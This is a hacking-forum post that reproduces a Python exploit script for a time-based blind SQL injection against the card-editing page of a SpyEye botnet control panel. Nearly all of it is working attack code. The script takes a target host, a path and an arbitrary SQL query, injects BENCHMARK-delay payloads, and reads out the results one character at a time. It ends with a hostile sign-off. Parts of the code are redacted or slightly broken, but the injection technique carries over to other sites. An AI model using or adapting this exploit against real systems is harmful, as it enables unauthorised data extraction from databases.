A25414N
Professional
- Messages
- 217
- Reaction score
- 19
- Points
- 18
Blind SQL injection Vulnerability Discovered in SpyEye Botnet by S4(uR4
Download Exploit
PHP:
#!/usr/bin/python
from httplib import HTTPConnection
from time import time
from sys import exit, argv, stdout
import urllib
print """
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 __ __ __ __ 1
1 /'__`\ /'__`\/\ \__ /'__`\ 0
0 _ __ /\ \/\ \/\ \/\ \ \ ,_\ __ __ __/\ \/\ \ _ __ ___ ___ 1
1 /\`'__\ \ \ \ \ \ \ \ \ \ \/ /\ \/\ \/\ \ \ \ \ \/\`'__\/' __` __`\ 0
0 \ \ \/ \ \ \_\ \ \ \_\ \ \ \_\ \ \_/ \_/ \ \ \_\ \ \ \/ /\ \/\ \/\ \ 1
1 \ \_\ \ \____/\ \____/\ \__\\ \___x___/'\ \____/\ \_\ \ \_\ \_\ \_\ 0
0 \/_/ \/___/ \/___/ \/__/ \/__//__/ \/___/ \/_/ \/_/\/_/\/_/ 1
1 0
0 1
1 >> SpyEye r0073r xpl01t 0
0 >> author : Sanjar Satsura 1
1 >> sanjar[at]xakep[dot]ru 0
0 >> Public v.0.1 1
1 >> )c( 2011 0
0 1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-0
Example:
Spyeye_r0073r <host>/dir/"version()"
"""
if len(argv)<=3: exit()
else: print "[+]Started pwn..."
host = argv[1]
path = argv[2]
sql = argv[3]
port = 80
hash = ""
full = ****
for k in range(48,122):
full.append(k)
full.append(0)
# full value [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 0]
# This is the charset to try
delay = 0.5
a=1
while a <= 32:
for i in full:
j = 0
if i == 0: exit('\n[+]Finished\n')
#
start = time()
# start time for the delay
conn = HTTPConnection(host,port)
#values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((4.0.5),a,1)),0)="K"),BENCHMARK(9000000,SHA1(1)),1));-- /*" }
values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((" + sql + ")," + str(j) + ",1)),0)=" + str(i) + "),BENCHMARK(9000000,SHA1(1)),1));-- /*" }
data = urllib.urlencode(values)
print data
conn.request("GET", path + "frm_cards_edit.php?" + data )
response = conn.getresponse()
read = response.read()
print read
if response.status == 404: exit('[+]404')
#404
now = time()
if now - start > delay:
#has come true then the character is valid
stdout.write(chr(i))
stdout.flush()
hash += chr(i)
a += 1
break;
else: j += 1
print "i vale %s, y J vale %s" %(i,j)
# w4tch u. h4ck u. fuck u. 1337day
# www.r00tw0rm.comDownload Exploit
